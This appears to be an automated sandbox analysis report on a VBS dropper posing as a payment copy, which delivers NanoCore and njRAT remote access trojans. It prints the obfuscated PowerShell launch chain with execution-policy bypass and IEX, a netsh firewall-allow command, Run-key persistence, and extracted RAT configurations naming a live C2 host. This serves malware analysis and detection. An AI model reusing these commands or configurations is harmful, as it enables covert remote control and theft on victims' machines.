Overview

overview

10

Static

static

U2M19O_Pay...py.vbs

windows7_x64

3

U2M19O_Pay...py.vbs

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    18-11-2021 19:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    U2M19O_Payment_Copy.vbs

  • Size

    2KB

  • MD5

    13f187df5383e456f90b6c337d9fc0e7

  • SHA1

    5a37a0a1d44f7fd4323234d1a6c8264da4a64ee4

  • SHA256

    816d9c966736b02b56d23629f8968fdb4f910fd575c4c07b524bd51948c5d4ed

  • SHA512

    51d4373ab08780bd7d746f961feb8f8749967bba0c2e785aaeb18b961a62c364be63c86ec3df969e17ea987454ea76628d13d1c0127886f2ac5f840a4af2b6d9

Score
10/10
nanocorenjrathackedevasionkeyloggerpersistencespywarestealersuricatatrojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

C2

jamcav.duckdns.org:6746

Mutex

9bb8b571-1a08-4fb2-8447-a1da0968f2fa

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    jamcav.duckdns.org

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2021-08-20T15:54:30.577245636Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    6746

  • default_group

    jam

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    9bb8b571-1a08-4fb2-8447-a1da0968f2fa

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    jamcav.duckdns.org

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

    keyloggertrojanstealerspywarenanocore
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • suricata: ET MALWARE Possible NanoCore C2 60B

    suricata: ET MALWARE Possible NanoCore C2 60B

    suricata
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\U2M19O_Payment_Copy.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4508
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
            "C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe"
            5⤵
            • Executes dropped EXE
            PID:2412
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
            PID:1892
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            PID:2008
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            4⤵
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3848
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" "jsc.exe" ENABLE
              5⤵
                PID:4636

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        MD5

        ea6243fdb2bfcca2211884b0a21a0afc

        SHA1

        2eee5232ca6acc33c3e7de03900e890f4adf0f2f

        SHA256

        5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

        SHA512

        189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jsc.exe.log
        MD5

        6cbb1d6c55c64852f7b0e9414b2adda6

        SHA1

        ffb792bb6182475bea27e090e347bfe0fe87f9ed

        SHA256

        6d98c0f1c22acff523f7bdc81746a0ad7ed811d6a8de4ca8fa76d24b73c6e469

        SHA512

        236aa3aaff08969eb470d2a077eea37cf10169ae2455568fc3e9c753e13e55654ff0a6730c7732b5f1b02d64a0fceb17626b05b87a922f4c20369c76c99ad2a4

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        77d7fb55f4f5ca865ac0d72a83ed368a

        SHA1

        9c0d16be97c1f6501fd42a4716b9c2cb646a527f

        SHA256

        b08aee1e5b1320b9e8175ffa7eecbaf6f7abc0319673dfa39f9ab612aff4bfd5

        SHA512

        62f0b1e22ab98e77ccfd458af4b56694f4ddc69bfa3e3afe8f39c31d23c7015827f0361c18e14f01c9f7d067ebcb8e4db43497180492c8f9bd3d11eda4a8041c

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
        MD5

        f1feead2143c07ca411d82a29fa964af

        SHA1

        2198e7bf402773757bb2a25311ffd2644e5a1645

        SHA256

        8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

        SHA512

        e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
        MD5

        f1feead2143c07ca411d82a29fa964af

        SHA1

        2198e7bf402773757bb2a25311ffd2644e5a1645

        SHA256

        8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

        SHA512

        e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

        Download Submit
      • C:\Users\Public\Downloads\HBar.ps1
        MD5

        1bae7491228ed609f685e4ddf0495777

        SHA1

        e559d10117c683e0dd5d4aac67ae37e6ec29631b

        SHA256

        f59cff14d9c84126dbfbc12e256f0f6f82e29250920d3d0ecb298a360d501375

        SHA512

        b757a741ab26161e022ecf7060e41705132c8c099c52a22799c2ef5612d918b19eef782d4bce7aaeed3e99532e0b87e828348bb805160fbb590e38d3afd08035

        Download Submit
      • memory/1396-167-0x0000000000400000-0x0000000000418000-memory.dmp
        Filesize

        96KB

        Download
      • memory/1396-173-0x00000000053E0000-0x00000000053E1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1396-172-0x0000000004E40000-0x0000000004E41000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1396-171-0x0000000004DA0000-0x0000000004DA1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1396-186-0x0000000004EE0000-0x00000000053DE000-memory.dmp
        Filesize

        5.0MB

        Download
      • memory/1396-168-0x00000000004123BE-mapping.dmp
        Download
      • memory/2008-191-0x00000000052B0000-0x00000000052B5000-memory.dmp
        Filesize

        20KB

        Download
      • memory/2008-194-0x0000000005350000-0x0000000005369000-memory.dmp
        Filesize

        100KB

        Download
      • memory/2008-177-0x0000000000400000-0x0000000000438000-memory.dmp
        Filesize

        224KB

        Download
      • memory/2008-187-0x0000000002BA0000-0x0000000002C32000-memory.dmp
        Filesize

        584KB

        Download
      • memory/2008-208-0x0000000002BA0000-0x0000000002C32000-memory.dmp
        Filesize

        584KB

        Download
      • memory/2008-198-0x0000000005E60000-0x0000000005E63000-memory.dmp
        Filesize

        12KB

        Download
      • memory/2008-178-0x000000000041E792-mapping.dmp
        Download
      • memory/2008-188-0x0000000002C30000-0x0000000002C31000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2412-182-0x0000000000000000-mapping.dmp
        Download
      • memory/2412-207-0x000000007EA40000-0x000000007EA41000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2412-190-0x0000000000940000-0x0000000000941000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3848-224-0x0000000005600000-0x0000000005AFE000-memory.dmp
        Filesize

        5.0MB

        Download
      • memory/3848-193-0x0000000000400000-0x0000000000410000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3848-195-0x000000000040BBCE-mapping.dmp
        Download
      • memory/4052-128-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-142-0x000001CAF1EE3000-0x000001CAF1EE5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-141-0x000001CAF1EE0000-0x000001CAF1EE2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-209-0x000001CAF1EE6000-0x000001CAF1EE8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-118-0x0000000000000000-mapping.dmp
        Download
      • memory/4052-130-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-129-0x000001CAF4170000-0x000001CAF4171000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4052-127-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-126-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-125-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-124-0x000001CAF3FC0000-0x000001CAF3FC1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4052-123-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-122-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-121-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-120-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4052-119-0x000001CAF1880000-0x000001CAF1882000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-135-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-144-0x000001BC35653000-0x000001BC35655000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-155-0x000001BC35656000-0x000001BC35658000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-151-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-148-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-147-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-146-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-166-0x000001BC35640000-0x000001BC35644000-memory.dmp
        Filesize

        16KB

        Download
      • memory/4508-145-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-143-0x000001BC35650000-0x000001BC35652000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-139-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-138-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-137-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-136-0x000001BC1CE90000-0x000001BC1CE92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4508-134-0x0000000000000000-mapping.dmp
        Download
      • memory/4636-223-0x0000000000000000-mapping.dmp
        Download